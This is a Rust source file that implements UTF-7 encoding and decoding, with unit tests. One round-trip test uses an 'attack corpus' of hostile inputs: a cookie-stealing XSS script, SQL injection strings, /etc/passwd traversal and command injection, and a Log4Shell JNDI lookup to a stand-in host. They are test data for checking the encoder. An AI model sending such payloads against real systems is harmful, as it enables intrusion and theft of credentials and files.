use base64::{Engine as _, engine::general_purpose};
/// Serializes one character as big-endian UTF-16 bytes.
///
/// Returns two bytes for a character that fits in a single UTF-16 code unit
/// and four bytes (high surrogate first) for one that needs a surrogate pair.
fn char_to_utf16be(c: char) -> Vec<u8> {
    // A `char` never needs more than two UTF-16 code units.
    let mut scratch = [0u16; 2];
    c.encode_utf16(&mut scratch)
        .iter()
        .flat_map(|unit| unit.to_be_bytes())
        .collect()
}
/// Encodes `bytes` with the standard base64 alphabet and no `=` padding,
/// which is the form used inside UTF-7 shifted sequences.
fn modified_base64(bytes: &[u8]) -> String {
    // The unpadded engine yields the same text as encoding with padding and
    // then stripping every '=': '=' never occurs in the standard alphabet
    // except as padding.
    general_purpose::STANDARD_NO_PAD.encode(bytes)
}
/// Reports whether `ch` is written to the encoder output unchanged.
///
/// The accepted set is the ASCII letters and digits plus the punctuation
/// characters `' ( ) , - . / : ?`. Everything else (including space and `+`)
/// is rejected.
fn is_utf7_direct(ch: char) -> bool {
    ch.is_ascii_alphanumeric() || "'(),-./:?".contains(ch)
}
/// Encodes `payload` as UTF-7.
///
/// * Characters accepted by `is_utf7_direct` are copied through unchanged.
/// * A literal `+` is written as the two-character escape `+-`.
/// * Every other character is collected as big-endian UTF-16 bytes; each
///   maximal run of such characters is emitted as `+<base64>-`, where the
///   base64 text carries no `=` padding.
///
/// The closing `-` of a shifted run is always written, even when the next
/// character could not be mistaken for base64.
#[must_use]
pub fn utf7_encode(payload: &str) -> String {
    /// Writes the pending UTF-16 bytes as one `+…-` run and empties the
    /// buffer. Does nothing when no bytes are pending.
    fn emit_pending(dest: &mut String, pending: &mut Vec<u8>) {
        if pending.is_empty() {
            return;
        }
        dest.push('+');
        dest.push_str(&modified_base64(pending));
        dest.push('-');
        pending.clear();
    }

    let mut encoded = String::new();
    let mut pending: Vec<u8> = Vec::new();

    for ch in payload.chars() {
        match ch {
            '+' => {
                emit_pending(&mut encoded, &mut pending);
                encoded.push_str("+-");
            }
            direct if is_utf7_direct(direct) => {
                emit_pending(&mut encoded, &mut pending);
                encoded.push(direct);
            }
            // Anything else joins the current shifted run.
            other => pending.extend_from_slice(&char_to_utf16be(other)),
        }
    }

    // The input may end in the middle of a shifted run.
    emit_pending(&mut encoded, &mut pending);
    encoded
}
/// Reports whether `b` belongs to the base64 alphabet used inside a shifted
/// sequence: ASCII letters, ASCII digits, `+` and `/`. The padding byte `=`
/// is not accepted.
fn is_modified_base64_byte(b: u8) -> bool {
    matches!(b, b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'+' | b'/')
}
/// Maps the first byte of a UTF-8 sequence to the sequence length it
/// announces.
///
/// Bytes below `0x80` give 1, `0xC0..=0xDF` give 2 and `0xE0..=0xEF` give 3.
/// Every remaining byte, including the continuation range `0x80..=0xBF`,
/// gives 4.
fn utf8_lead_len(first: u8) -> usize {
    // The number of leading one bits identifies the byte class:
    // 0xxxxxxx -> 0, 110xxxxx -> 2, 1110xxxx -> 3; everything else falls
    // through to the four-byte answer.
    match first.leading_ones() {
        0 => 1,
        2 => 2,
        3 => 3,
        _ => 4,
    }
}
/// Decodes UTF-7 text back into a `String`.
///
/// * `+-` decodes to a literal `+`.
/// * `+` followed by a run of base64 bytes is a shifted sequence: the run is
///   base64-decoded, the bytes are read as big-endian UTF-16 code units, and
///   one `-` directly after the run is consumed as its terminator.
/// * Any other character is copied through unchanged.
///
/// Returns `None` when a shifted run is not valid base64, decodes to an odd
/// number of bytes, or is not valid UTF-16, and when a literal character
/// cannot be sliced out of `s`.
///
/// NOTE(review): a `+` followed by neither `-` nor a base64 byte appears to
/// contribute nothing to the output instead of being rejected — confirm that
/// this leniency is intended.
#[must_use]
pub fn utf7_decode(s: &str) -> Option<String> {
    let bytes = s.as_bytes();
    let mut decoded = String::new();
    let mut pos = 0;

    while let Some(&current) = bytes.get(pos) {
        if current != b'+' {
            // Literal text: copy one whole UTF-8 character. `get` yields
            // `None` when the announced width overruns the input or does not
            // land on a character boundary.
            let width = utf8_lead_len(current);
            decoded.push_str(s.get(pos..pos + width)?);
            pos += width;
            continue;
        }

        if bytes.get(pos + 1) == Some(&b'-') {
            decoded.push('+');
            pos += 2;
            continue;
        }

        // Shifted sequence: take the maximal run of base64 bytes after '+'.
        let payload_start = pos + 1;
        let payload_len = bytes[payload_start..]
            .iter()
            .take_while(|&&byte| is_modified_base64_byte(byte))
            .count();
        let payload_end = payload_start + payload_len;

        // The run carries no '=' padding, but the padded engine expects the
        // length to be a multiple of four, so restore the padding first.
        let mut padded = s[payload_start..payload_end].to_owned();
        let missing = (4 - padded.len() % 4) % 4;
        padded.extend(std::iter::repeat('=').take(missing));

        let raw = general_purpose::STANDARD.decode(padded.as_bytes()).ok()?;
        // UTF-16 code units are two bytes each; a dangling byte is malformed.
        if raw.len() % 2 != 0 {
            return None;
        }
        let units: Vec<u16> = raw
            .chunks_exact(2)
            .map(|pair| u16::from_be_bytes([pair[0], pair[1]]))
            .collect();
        decoded.push_str(&String::from_utf16(&units).ok()?);

        pos = payload_end;
        // Swallow the optional '-' that closes the shifted sequence.
        if bytes.get(pos) == Some(&b'-') {
            pos += 1;
        }
    }

    Some(decoded)
}
#[cfg(test)]
mod tests {
    use super::{utf7_decode, utf7_encode};

    /// Direct characters pass through, `+` is escaped as `+-`, and non-ASCII
    /// text starts with a shift marker.
    #[test]
    fn utf7_basic_encode() {
        assert_eq!(utf7_encode("Hello"), "Hello");
        assert_eq!(utf7_encode("A+B"), "A+-B");
        assert!(utf7_encode("日本語").starts_with('+'));
    }

    /// Fixed encoded/plain pairs, checked through the decoder, plus one
    /// encoder check against the same vector.
    #[test]
    fn utf7_decode_matches_canonical_vectors() {
        let vectors = [
            ("+ADw-script+AD4-", "<script>"),
            ("+-", "+"),
            ("hello", "hello"),
        ];
        for (encoded, plain) in vectors {
            assert_eq!(utf7_decode(encoded).as_deref(), Some(plain));
        }
        assert_eq!(utf7_encode("<script>"), "+ADw-script+AD4-");
    }

    /// Every corpus entry must survive an encode/decode round trip unchanged.
    #[test]
    fn utf7_round_trips_attack_corpus_and_unicode() {
        let corpus = [
            "<script>alert(document.cookie)</script>",
            "' OR '1'='1' -- ",
            "1 UNION SELECT password FROM users",
            "../../../../etc/passwd",
            "${jndi:ldap://evil.tld/a}",
            "; cat /etc/passwd",
            "plain ascii",
            "+already+plus+",
            "café ☕ 日本語 😀 surrogate-pair",
            "",
            "=",
            "<>\"'&;|()[]{}",
        ];
        for p in corpus {
            let enc = utf7_encode(p);
            let decoded = utf7_decode(&enc);
            assert_eq!(
                decoded.as_deref(),
                Some(p),
                "UTF-7 round-trip lost bytes for {p:?} via {enc}"
            );
        }
    }
}